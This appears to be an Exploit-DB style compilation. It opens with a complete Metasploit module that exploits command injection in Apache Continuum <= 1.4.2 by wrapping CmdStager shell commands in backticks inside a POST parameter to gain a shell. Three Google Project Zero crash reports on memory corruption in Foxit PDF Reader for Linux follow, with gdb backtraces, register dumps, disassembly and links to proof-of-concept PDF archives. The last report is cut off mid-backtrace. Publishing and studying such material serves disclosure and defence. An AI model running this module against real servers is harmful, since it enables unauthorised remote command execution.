
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  # Command injection in Apache Continuum <= 1.4.2: the value of the
  # installation.varValue POST parameter sent to
  # /continuum/saveInstallation.action is wrapped in backticks by
  # execute_command below. The Rank describes the module's own reliability
  # rating, not anything about a given target.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  # Module metadata. The only option registered here is RPORT, defaulting to
  # 8080; remaining connection options are presumably supplied by the
  # included mixins (not visible in this file).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Continuum Arbitrary Command Execution',
      'Description'    => %q{
        This module exploits a command injection in Apache Continuum <= 1.4.2.
        By injecting a command into the installation.varValue POST parameter to
        /continuum/saveInstallation.action, a shell can be spawned.
      },
      'Author'         => [
        'David Shanahan', # Proof of concept
        'wvu'             # Metasploit module
      ],
      'References'     => [
        %w{EDB 39886}
      ],
      'DisclosureDate' => 'Apr 6 2016',
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'Privileged'     => false,
      'Targets'        => [
        ['Apache Continuum <= 1.4.2', {}]
      ],
      'DefaultTarget'  => 0
    ))

    register_options([
      Opt::RPORT(8080)
    ])
  end

  # Passive version check: GET /continuum/about.action and look for the
  # literal '1.4.2' anywhere in the response body.
  #
  # This is a loose fingerprint. Any body containing '1.4.2' yields Appears
  # and any HTTP 200 yields Detected, so Appears means "likely", not
  # "confirmed"; the check never sends the injection itself. If res is nil
  # both branches are skipped and Safe is returned.
  #
  # @return [CheckCode] Appears, Detected, or Safe
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/continuum/about.action'
    )

    if res && res.body.include?('1.4.2')
      CheckCode::Appears
    elsif res && res.code == 200
      CheckCode::Detected
    else
      CheckCode::Safe
    end
  end

  # Entry point: delegates to the CmdStager mixin with the Bourne-shell
  # flavor; the mixin invokes execute_command below for each command it
  # generates.
  def exploit
    print_status('Injecting CmdStager payload...')
    execute_cmdstager(flavor: :bourne)
  end

  # CmdStager callback: runs one shell command on the target by POSTing it,
  # wrapped in backticks, as installation.varValue. installation.name is
  # random (8 alpha chars) so every request differs; installation.type is
  # always 'jdk'. The HTTP response is not inspected, so a failed request is
  # silent at this layer.
  #
  # Detection note for defenders: a POST to /continuum/saveInstallation.action
  # whose installation.varValue contains backticks is a strong indicator of
  # this technique.
  #
  # @param cmd  [String] shell command to run
  # @param opts [Hash]   accepted for the callback signature; unused here
  def execute_command(cmd, opts = {})
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => '/continuum/saveInstallation.action',
      'vars_post' => {
        'installation.name'     => Rex::Text.rand_text_alpha(8),
        'installation.type'     => 'jdk',
        'installation.varValue' => '`' + cmd + '`'
      }
    )
  end

end
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=742

We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:

$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf

The DISPLAY=:1 environment variable is set because we test the application with a virtual X server (Xvfb); the issue should be equally reproducible when the program is started with standard display settings.

An example excerpt from the crash log is as follows:

--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const ()
(gdb) where
#0  0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const ()
#1  0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const ()
#2  0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const ()
#3  0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const ()
#4  0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#5  0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#6  0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) ()
#7  0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#8  0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#9  0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#10 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#11 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#12 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#13 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#14 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#15 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#16 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#17 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) ()
#18 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x1a1c3b0)
    at ../../Readerlite/ReaderLite/src/childframe.cpp:91
#19 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x194ce60)
    at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61
#20 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x14c5470, pdoc=0x193a720, 
    filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99
#21 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x14c5470, csFilterName=..., 
    wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216
#22 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x14a47e0, csFDFFile=...)
    at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941
#23 0x000000000043caac in CMainWindow::OpenFile (this=0x14c4240, fileName=...)
    at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434
#24 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:301
(gdb) x/10i $rip
=> 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>:
    mov    0x0(%r13,%rbp,8),%rcx
   0xaab971 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+99>:        test   %rcx,%rcx
   0xaab974 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+102>:
    jne    0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>
   0xaab976 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+104>:       inc    %rbp
   0xaab979 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+107>:       movzbl 0xe(%rbx),%eax
   0xaab97d <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+111>:       cmp    %ebp,%eax
   0xaab97f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+113>:
    jg     0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>
   0xaab981 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+115>:
    jmp    0xaab99f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+145>
   0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>:       mov    0xc(%rsp),%esi
   0xaab987 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+121>:       mov    %r15,%r9
(gdb) info reg
rax            0x7c     124
rbx            0x1a66130        27681072
rcx            0xe1a704fcae02ca58       -2186773610767398312
rdx            0x7fffffffceec   140737488342764
rsi            0x2f     47
rdi            0x1a66130        27681072
rbp            0x0      0x0
rsp            0x7fffffffce90   0x7fffffffce90
r8             0xab0f92 11210642
r9             0x6a83f4ca       1787032778
r10            0xfd     253
r11            0x0      0
r12            0x7fffffffceec   140737488342764
r13            0xe1a704fcae02ca58       -2186773610767398312
r14            0xab0f92 11210642
r15            0x6a83f4ca       1787032778
rip            0xaab96c 0xaab96c <CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const+94>
eflags         0x10202  [ IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
--- cut ---

Attached are three proof of concept PDF files.

There is another crash that is likely related to this issue:

--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) ()
(gdb) where
#0  0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) ()
#1  0x0000000000aab8e4 in CFX_BaseSegmentedArray::IterateSegment(unsigned char const*, int, int (*)(void*, void*), void*) const ()
#2  0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const ()
#3  0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const ()
#4  0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const ()
#5  0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#6  0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#7  0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) ()
#8  0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#9  0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#10 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#11 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#12 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#13 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#14 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#15 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#16 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) ()
#17 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x196cf90)
    at ../../Readerlite/ReaderLite/src/childframe.cpp:91
#18 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x191dce0)
    at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61
#19 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x1468c50, pdoc=0x19194b0, 
    filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99
#20 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x1468c50, csFilterName=..., 
    wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216
#21 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x144a920, csFDFFile=...)
    at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941
#22 0x000000000043caac in CMainWindow::OpenFile (this=0x1468760, fileName=...)
    at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434
#23 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:301
(gdb) x/10i $rip
=> 0xab0f94 <_Z19_CMapLookupCallbackPvS_+2>:    cmp    %edi,(%rsi)
   0xab0f96 <_Z19_CMapLookupCallbackPvS_+4>:    jne    0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>
   0xab0f98 <_Z19_CMapLookupCallbackPvS_+6>:    xor    %eax,%eax
   0xab0f9a <_Z19_CMapLookupCallbackPvS_+8>:    cmpb   $0xfe,0x4(%rsi)
   0xab0f9e <_Z19_CMapLookupCallbackPvS_+12>:   setne  %al
   0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>:   xor    $0x1,%eax
   0xab0fa4 <_Z19_CMapLookupCallbackPvS_+18>:   retq   
   0xab0fa5 <_CompareDWord>:    mov    (%rdi),%eax
   0xab0fa7 <_CompareDWord+2>:  sub    (%rsi),%eax
   0xab0fa9 <_CompareDWord+4>:  retq   
(gdb) info reg $rsi
rsi            0x71     113
--- cut ---

Attached are three further files that reproduce the crash (note that MALLOC_CHECK_=3 may be necessary).


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39944.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=743

We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:

$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf

The DISPLAY=:1 environment variable is set because we test the application with a virtual X server (Xvfb); the issue should be equally reproducible when the program is started with standard display settings.

An example excerpt from the crash log is as follows:

--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) ()
(gdb) info reg $rdx
rdx            0x90ff9fc23e15101d       -7998498756572671971
(gdb) where
#0  0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) ()
#1  0x0000000000922297 in kdu_supp::kdu_region_decompressor::start(kdu_core::kdu_codestream, kdu_supp::kdu_channel_mapping*, int, int, int, kdu_core::kdu_dims, kdu_core::kdu_coords, kdu_core::kdu_coords, bool, kdu_core::kdu_component_access_mode, bool, kdu_core::kdu_thread_env*, kdu_core::kdu_thread_queue*) ()
#2  0x00000000008bd50d in CJPX_Decoder::Start(unsigned char*, int, int, unsigned char*) ()
#3  0x00000000007f8d77 in CPDF_DIBSource::StartLoadJpxBitmap() ()
#4  0x00000000007f9137 in CPDF_DIBSource::CreateDecoder() ()
#5  0x00000000007fadb0 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) ()
#6  0x00000000007f2f74 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#7  0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#8  0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#9  0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#10 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
#11 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) ()
#12 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) ()
#13 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) ()
#14 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) ()
#15 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) ()
#16 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#17 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#18 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#19 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#20 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1946d30)
    at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#21 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#22 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#23 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#24 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#25 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#27 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, Q---Type <return> to continue, or q <return> to quit---
Region const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#45 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#46 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#47 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#48 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#49 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#50 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#51 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#52 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#53 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#54 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#55 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#56 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#57 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0x8ee95d <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+135>:    mov    0x4(%rdx),%rcx
   0x8ee961 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+139>:    mov    %rcx,(%rbx)
   0x8ee964 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+142>:
    movslq 0x320(%rax),%rcx
   0x8ee96b <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+149>:    mov    0x4(%rbx),%esi
   0x8ee96e <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+152>:
    movzbl 0x19(%rdx,%rcx,1),%ecx
   0x8ee973 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+157>:    shl    %cl,%esi
   0x8ee975 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+159>:
    movslq 0x320(%rax),%rcx
   0x8ee97c <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+166>:    mov    %esi,0x4(%rbx)
   0x8ee97f <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+169>:
    movzbl 0x3a(%rdx,%rcx,1),%ecx
   0x8ee984 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+174>:    mov    (%rbx),%edx
(gdb) info reg $rdx
rdx            0x90ff9fc23e15101d       -7998498756572671971
(gdb) x/10wx $dx
0x101d: Cannot access memory at address 0x101d
(gdb) x/10wx $rdx
0x90ff9fc23e15101d:     Cannot access memory at address 0x90ff9fc23e15101d
--- cut ---

Attached is a proof of concept PDF file.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39943.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=744

We have identified the following crash due to an out-of-bounds read in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:

$ MALLOC_CHECK_=3 DISPLAY=:1 FoxitReader /path/to/poc/file.pdf

The MALLOC_CHECK_=3 environment variable enforces strict checks in the libc memory allocator, and DISPLAY=:1 is set because we test the application with a virtual X server (Xvfb); the issue should be equally reproducible when the program is started with standard display settings.

An example excerpt from the crash log is as follows:

--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const ()
(gdb) where
#0  0x00000000007fb462 in CPDF_DIBSource::TranslateScanline24bpp(unsigned char*, unsigned char const*) const
    ()
#1  0x00000000007fbd6c in CPDF_DIBSource::GetScanline(int) const ()
#2  0x000000000084b849 in CFX_DIBSource::Clone(FX_RECT const*) const ()
#3  0x00000000007f2e71 in CPDF_ImageCache::ContinueGetCachedBitmap() ()
#4  0x00000000007f2f9e in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#5  0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#6  0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#7  0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
#8  0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
#9  0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) ()
#10 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) ()
#11 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) ()
#12 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) ()
#13 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) ()
#14 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
#15 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
#16 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
#17 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
#18 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x191fca0)
    at ../../Readerlite/ReaderLite/src/preview.cpp:1305
#19 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
